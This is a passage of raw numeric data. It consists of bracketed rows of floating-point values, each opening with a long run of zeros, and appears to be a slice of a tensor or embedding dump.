0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04144, 0.003685, -0.01927, -0.03452, -0.013985, -0.005554, -0.03098, 0.0002613, 0.01071, -0.05045, -0.0494, 0.03177, -0.02634, -0.03065, 0.005375, 0.01726, -0.0419, -0.0018215, 0.01906, -0.05563, -0.05087, -0.04395, -0.05594, 0.03888, -0.04785, -0.02197, 0.0003908, -0.0349, -0.03067, 0.0357, 0.02255, -0.03072, 0.01279, 0.000891, 0.02417, 0.02759, 0.0275, -0.01313, -0.02939, 0.02611, -0.0606, -0.05066, 0.01437, 0.02382, -0.02972, 0.002035, 0.03406, -0.02928, -0.01797, -0.04834], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01134, 0.605, 0.00252, -0.2717, 
-0.1914, -0.2932, 0.1532, 0.36, 0.2825, -0.3232, 0.528, -0.656, -0.493, 0.8076, 0.1575, 0.002096, 0.6265, 0.1707, -0.05377, 0.863, 0.2944, 0.0655, -0.2041, -0.00334, -0.01094, 0.2803, -0.518, 0.02582, 0.1809, 0.7407, -0.00677, 0.2908, -0.8354, -0.02005, -1.382, -0.1659, 0.00235, 0.2252, 0.02818, 0.88, 0.08673, 0.5815, 0.245, 0.0863, 0.0458, -0.1605, -0.961, -1.85, 0.0731, 0.02826], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3687, 0.2632, 0.1409, -0.328, -0.0368, -0.1164, 0.0613, 0.1356, 0.8486, 0.0588, -1.105, 0.3943, 0.06174, 0.4714, -0.743, 0.03632, -1.375, -0.2542, -0.25, -0.4272, -0.0749, 2.094, -0.4126, 0.02068, -0.02003, -2.709, 0.3735, 0.05997, -0.642, -0.1765, 0.1877, -0.0862, 0.4111, -0.01653, -6.515e-05, -0.0664, 1.175, -0.512, 0.1354, 0.1853, -0.0777, -1.496, 0.7217, -0.0702, -0.2756, -0.1611, 1.619, 0.4854, -0.05194, 0.0976], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3196, 1.551, 0.2294, -1.208, 0.02063, 0.0808, 0.1181, -0.8105, 0.02504, -0.2155, 1.195, 0.4998, -0.838, -0.285, -0.005615, -0.009926, 0.7085, 0.8135, 0.966, 0.5493, -0.4688, 0.2202, 0.11115, 0.012146, -0.03412, -0.0816, -0.1628, -0.2708, 0.5815, -0.1214, 0.2074, -0.4048, 0.7593, 0.2737, -0.936, 0.04614, -0.589, -0.1586, -0.01651, 0.8105, -0.00963, 2.11, -1.09, 0.3972, -0.2722, -3.312, -0.01965, 0.7017, -0.1102, -0.2457], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1226, 
0.3945, -0.3142, -0.0062, 0.7114, -0.08234, -0.4824, -2.49, -0.8706, 0.01813, -1.107, -0.5264, -0.2429, 0.518, 0.0558, 0.04547, 0.0856, -1.486, 0.3433, -0.537, -0.6445, 0.1465, -0.02432, -0.0463, 0.03226, -1.62, 0.138, 1.601, -1.523, 0.3928, 0.2512, 0.58, 1.202, -1.212, -1.267, -2.393, 2.027, 0.1153, -0.1997, 1.129, 0.2979, -0.5977, -1.304, -0.9204, 0.5913, -2.56, -1.346, 1.326, 0.212, -0.1423], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01563, 0.01685, -0.02309, -0.05792, -0.05606, -0.04092, -0.01269, -0.03577, 0.03665, 0.01067, 0.03595, -0.011215, -0.0188, -0.00436, -0.0289, -0.01595, 0.02904, 0.03986, -0.04312, 0.03925, -0.01221, 0.03464, -0.02045, -0.02812, 0.00718, -0.0311, -0.02507, 0.0155, -0.00733, 0.01358, 0.02109, 0.03342, -0.004726, -0.02402, -0.02654, 0.009346, 0.01106, -0.0485, -0.0139, 0.0008955, -0.0292, -0.04578, -0.02177, 0.0192, -0.00605, 0.0214, -0.048, -0.003458, -0.001835, 0.009544], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.304, 0.6265, 0.0553, -0.2683, 0.1517, 0.1646, 0.876, 0.8193, 0.5405, 0.339, -0.496, 0.3523, 0.08575, -1.522, -0.5713, 0.03023, -1.307, 0.893, -0.587, -1.183, -0.2019, 1.355, 0.2544, -0.007416, -0.01435, 0.4915, 0.3218, 0.2668, 0.641, 0.04272, 0.133, -0.1862, -0.1284, -0.04828, 0.03867, 1.13, -0.2457, 0.2556, -0.1533, -0.309, 0.3845, 0.529, -0.136, -0.1492, -0.4795, -0.1357, 1.157, 0.745, 0.667, -0.4006], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.113, -0.192, -0.04865, -0.4143, -1.096, 0.875, -0.9624, 1.057, 0.2164, -1.6455, 0.6255, 0.05405, -2.299, -0.1417, -1.067, -0.02687, -0.152, 0.1879, 0.2133, 0.0732, -0.1486, -0.3628, -0.3762, -0.004604, -0.0075, -2.947, 1.047, 0.1162, 1.827, -0.65, -0.4883, -0.4932, -1.688, -0.3452, 1.753, 0.685, -1.411, 0.8433, -0.0378, -0.631, -0.298, 0.2996, 0.4766, -0.4114, -1.43, 0.266, -3.338, -2.607, -0.567, 0.809], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.925, -1.694, -0.02568, -1.615, -0.1388, 0.527, -0.06274, 0.03192, -0.583, 0.4795, -1.334, -0.686, -1.244, 0.5923, -0.6562, 0.01811, -0.8794, 1.585, -0.2686, -0.6484, -0.2483, 0.002077, 0.175, 0.0394, -0.03137, 0.459, 0.004578, -0.316, 1.232, 0.0672, 0.1439, 0.5317, -0.3, -0.03174, -1.776, -0.1787, 1.788, 0.1832, 0.0837, -0.5093, 0.137, -0.493, -0.2327, -0.0971, -0.11127, 1.215, 1.037, 0.532, 1.465, 0.1294], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.863, -0.67, -1.38, -0.10986, 0.0747, 0.72, -0.03256, -0.1451, -0.351, -0.1941, 0.693, -0.7954, 0.3403, -0.4358, 0.1248, 0.03772, -0.926, -0.0452, 0.1511, 0.11707, 0.06235, 0.475, -0.1959, 0.02454, -0.02675, -0.2352, 0.10175, 0.4875, 0.05685, 0.949, -0.9966, -1.039, 1.205, 0.0508, 0.01443, -0.8745, -0.1326, 0.09607, -2.873, -1.791, 0.0883, 0.0465, -0.043, 0.5703, 0.682, 0.305, -1.174, -0.1422, 0.0451, 0.541], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.001486, -0.00357, -0.0617, -0.06366, 0.02477, -0.03049, -0.0441, 0.00903, -0.02225, 0.01127, -0.02292, -0.0373, -0.005047, -0.02795, 0.01738, 0.03937, 0.011604, -0.04376, -0.0403, -0.0562, 0.02988, 0.004307, 0.02577, 0.01461, -0.01866, 0.02591, 0.012436, 0.03038, -0.02292, -0.04602, 0.02731, -0.05273, 0.03885, -0.005363, -0.01098, -0.0371, -0.002846, -0.06635, -0.0454, -0.0462, -0.003315, -0.03653, 0.02913, -0.02469, -0.02771, 0.005486, -0.0177, 0.0259, -0.04138, 0.01214], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.785, -0.05972, -0.0007668, 0.9214, -0.7095, 0.3804, 0.1943, 0.00413, -2.654, 0.669, -0.2715, -0.1453, 0.297, 0.9487, -1.819, 0.04205, -0.9775, -0.07526, -0.3257, -0.414, -1.113, -0.3691, -0.06415, 0.04504, 0.0367, -0.0664, 0.674, -0.11, 1.514, -0.99, 0.5464, 0.2102, 0.0236, 0.808, -1.51, 0.298, -1.763, 0.1247, -0.8228, -0.1355, 0.0584, -2.557, -0.1676, 0.3042, 1.111, -5.613, 0.3152, -0.0748, -0.604, 1.017], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01875, -0.03333, -0.03815, 0.0162, -0.03625, -0.03326, 0.001578, 0.01334, -0.01927, 0.01371, 0.04242, -0.01299, -0.0547, -0.02077, -0.02922, -0.0309, 0.01335, -0.03348, 0.007504, 0.00401, -0.001606, -0.03973, -0.0435, 0.01009, -0.01013, 0.0002166, -0.0441, -0.04587, 0.02405, -0.007572, -0.02036, 0.01461, 0.003674, -0.02986, 0.02246, -0.004707, -0.02449, -0.04553, -0.012535, -0.001576, -0.03198, -0.01807, -0.006332, 0.005836, 0.03114, -0.000496, -0.04407, 0.0437, 0.01429, 0.02612], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.953, -1.719, -1.84, -0.01863, -0.01089, 0.1178, 0.0828, -0.837, -0.09015, -0.148, 0.5254, -0.686, -0.678, 0.3066, -0.3477, -0.00514, 0.8228, -0.3413, 0.8877, -0.732, -0.03047, -1.104, 0.3638, -0.029, 0.00714, 0.168, 0.2961, -0.2917, -0.5913, -0.06274, -0.4946, 0.09467, 1.504, 0.534, -0.02623, 0.0914, -0.1312, 0.4617, -1.271, -1.409, 0.2263, 0.8325, 0.586, -1.192, -0.1592, -0.2776, 0.10205, -0.1337, -0.03232, 0.497], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.254, 2.078, -0.03293, -0.3196, 0.399, 0.03906, -1.108, -0.4438, -0.06104, 0.1488, -0.9595, -0.3735, -0.3066, -0.1342, 0.585, -0.0453, 0.06195, 0.5586, 0.08905, -0.1126, 0.618, -0.92, -0.2349, 0.012985, 0.0112, -0.0011835, -0.6494, 2.717, -0.519, -0.8057, 0.421, 0.2524, 0.765, -1.199, 1.057, -1.713, -0.1779, 0.2808, -0.2927, -0.945, -0.0642, -0.802, -1.0625, 0.0773, 0.2346, 0.996, -0.2822, 2.297, -2.062, -0.3694], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5825, 0.833, -0.6284, -0.1035, -0.0001231, 0.3162, -0.261, 0.0305, 0.2129, 0.1835, -0.3071, -0.2908, -0.11554, -0.1853, -0.09894, 0.03964, 0.1318, 0.1987, -0.1964, 0.09955, -0.2913, 1.179, 0.1343, 0.0483, 0.0367, 0.2056, 0.3684, 1.213, -0.1854, 0.1781, 0.1859, 0.05905, -0.0999, -0.211, 0.2157, 0.3318, -0.1664, -0.02866, -0.02611, 0.256, 0.184, -0.353, 1.117, -0.0612, -0.02525, 0.3425, 0.12463, -0.2495, 0.322, 0.8223], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1368, 0.07214, -0.2593, -0.02083, -0.1506, -0.08954, 0.02457, -0.03415, -0.1222, -0.06384, -0.02823, -0.1995, -0.06665, 0.03293, -0.09796, 0.04767, 0.0698, -0.0435, 0.04752, -0.1053, 0.00866, 0.05075, 0.03177, 0.04562, -0.03555, 0.02657, 0.07904, 0.03723, 0.09985, 0.04706, 0.02017, -0.04822, 0.0617, -0.03014, 0.04718, 0.0881, -0.06274, -0.05142, -0.01154, -0.01721, -0.02977, 0.0545, 0.02156, 0.08966, 0.003513, 0.1199, -0.0481, -0.0746, 0.0317, 0.004375], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5825, -0.1108, 0.2157, -0.0994, 0.2915, 0.792, -2.645, 0.1333, 0.03452, -0.547, -1.589, -0.5884, 0.1335, -1.365, 0.04483, 0.004322, 1.961, -0.3416, 0.904, -1.372, 0.2158, -2.438, -0.3845, 0.01854, -0.04538, 0.915, -0.5513, 0.4185, 0.4678, 0.1987, -0.6084, 0.3826, -0.3782, 0.6655, -0.05237, 0.04913, 0.2231, -0.4106, 0.901, 0.873, -0.2308, 0.964, -0.063, 0.238, 0.05298, 0.425, -0.2517, -1.06, -2.006, 0.541], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.786, -0.2717, -0.4053, 0.1599, -0.843, 0.3374, 0.1118, -0.015175, -0.1387, 0.4229, -0.307, 0.0784, -0.3936, 0.2072, 0.2113, 0.003408, -0.4688, 0.1233, -0.06012, 0.6885, -0.2666, 0.1852, 0.07043, -0.01828, -0.02013, 0.5513, -0.6504, -0.6284, 0.7583, -0.636, -0.6084, -0.01637, -0.24, 1.079, -0.5464, 0.4485, 0.377, 0.6553, 0.1743, -0.3542, -0.2323, 0.1164, -0.333, -0.5786, 0.2091, -0.578, 0.452, 0.9316, 0.10895, 0.0912], 
[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.658, -0.7764, -0.01383, -0.1838, 0.5635, 0.2488, 0.656, 0.7197, 0.1943, -0.1198, -0.1434, 0.2318, 0.2485, -0.599, 0.1826, -0.01331, -0.1033, -0.1604, 0.262, -0.588, 0.2573, -0.7163, -0.2277, -0.00741, 0.03928, 0.502, -0.2462, -0.63, -0.000498, -0.2272, -0.3867, 0.04337, 0.4956, 0.724, -0.555, 0.3657, 0.6436, -0.06113, 0.1641, 0.2554, -0.2246, -0.0591, -0.3018, -0.62, 0.2072, -0.01122, 0.328, 1.045, -0.2566, 0.5938], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.334, 0.4045, -0.4617, 0.02164, 0.02248, 0.58, 0.01627, 0.1305, -0.3367, 0.08984, 0.7896, 0.8027, -0.04852, -0.497, -0.1321, -0.0006585, 0.39, -0.10474, -0.1454, -0.1786, 0.4788, -0.01599, 0.2013, -0.0382, -0.005116, 0.3762, 0.2297, 0.32, -0.2603, -0.1142, -0.06726, -0.2402, -0.6997, 0.629, -0.3806, 0.11005, -0.5596, 0.677, 1.255, -0.372, -0.634, 0.4136, 0.229, 0.747, -0.2125, -0.782, 0.0701, 0.718, -0.05374, 0.2783], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3586, -0.2085, -0.2588, 0.1113, 0.05963, -0.4543, 0.1825, -0.8228, -0.686, 0.7446, -2.176, -0.4182, -0.1224, 1.375, 0.4858, 0.005505, -0.4426, 0.1914, 0.1243, -0.2168, -0.813, 0.814, -0.09265, 0.02948, -0.02348, 0.851, -0.3105, 0.7993, -1.182, -0.00795, 0.0995, 0.9517, -0.2668, -0.2812, -0.384, 0.0802, 1.533, 0.3196, 0.07117, 0.851, 0.634, -1.071, 0.249, -0.1906, 0.4866, 0.4355, 2.387, 1.612, 
0.342, 0.06573], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.949, 0.696, -0.516, -0.1907, 0.733, -2.002, -0.5415, -0.4348, 0.3865, 0.2559, 2.273, -0.9023, -0.6313, 1.411, -0.5796, 0.01117, -0.152, 0.3027, -0.7256, 0.2185, 0.4944, -0.379, 0.34, -0.04834, 0.04285, -1.358, -0.6084, 0.1228, 0.4243, 0.526, 0.564, 0.651, -0.417, -0.287, 1.302, -3.072, -0.7134, -0.97, -0.01788, 0.472, -0.04163, -0.831, -0.8364, -1.105, -0.3835, -1.391, -2.809, -1.937, 0.8516, -0.1661], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.516, 0.5513, 0.9297, -0.414, 0.4526, 0.8965, -0.653, 0.832, 0.827, 0.2208, 0.4646, 0.4014, 0.2408, -0.2795, -0.2673, -0.006413, 0.9385, 0.4155, 0.057, 0.0867, 0.9976, -0.625, -0.5166, -0.04938, 0.001881, 1.315, -0.2212, -1.735, 0.4497, -0.0669, -0.0354, 0.5864, 0.0387, 0.2666, 0.1898, -0.012634, -0.8545, 1.089, 0.1636, -0.1342, -0.12195, 0.3354, 0.6284, 0.01292, -0.296, 0.11597, 0.4617, 2.11, 0.05, 0.3271], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2306, -0.008194, -0.06854, 0.0448, -0.224, -0.5425, 0.2186, 0.252, -0.1404, 0.08606, 0.1736, -0.539, -0.01709, -0.0257, -0.2152, -0.03287, -0.2239, 0.0865, 0.1676, -0.3557, 0.1047, -0.006744, 0.01883, 0.008934, 0.006645, 0.2257, -0.157, 0.0089, -0.2153, 0.113, 0.395, 0.359, -0.1321, -0.33, -0.1547, -0.02243, -0.1509, -0.09485, 0.1628, -0.00301, -0.1484, -0.0701, 0.376, 0.3164, -0.02393, 0.1213, 
-0.3313, -0.2098, 0.03455, 0.2559], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.547, 0.1263, 0.3342, 0.718, 0.0883, 0.991, 0.1486, 0.413, -3.19, -0.7563, 0.495, -0.4333, -0.726, 0.209, 0.0277, -0.000543, -0.2844, -0.8467, 0.6816, -0.4634, -0.3472, 0.1339, -0.01374, 0.02148, 0.02313, 0.516, -0.2957, -0.084, -0.3306, -0.10815, -0.00787, 0.177, 2.264, 0.4102, 0.7866, -0.1581, -0.802, -0.491, 0.05936, -1.185, -0.1536, -2.111, -0.1338, 0.3464, 0.436, 0.508, -0.2393, 0.4348, 0.08984, 0.02298], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.223, 1.134, -1.596, -0.2898, -0.3262, 0.03958, -0.2507, 0.179, -0.4917, 0.2153, -0.2372, -0.824, -0.31, 0.152, -0.529, 0.03683, 0.3918, -0.3853, 0.1882, 0.3074, -0.2876, -0.11755, 0.1924, -0.003681, 0.0385, -0.3662, 0.3503, 0.5254, 0.4885, 0.779, 0.057, -0.2324, 2.021, -0.3455, 2.531, 0.4531, 0.0901, -0.2854, -1.337, 0.9746, 0.1968, 0.06152, 0.3782, 0.1755, 0.03598, -0.1846, -0.8555, -0.2047, 0.1272, 0.569], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01311, -0.01361, 0.00671, 0.002888, -0.0564, -0.02277, -0.005074, -0.03192, 0.01223, -0.04108, 0.02997, -0.0097, 0.04086, 0.0312, -0.0382, 0.04315, -0.01218, -0.00472, 0.01324, 0.03632, 0.002317, -0.02597, -0.05222, -0.0136, -0.02336, -0.0276, -0.00966, 0.005966, 0.00491, 0.003069, -0.01878, 0.0202, -0.01762, -0.033, -0.02649, -0.03326, 0.0346, 0.003956, -0.04193, 0.01791, 
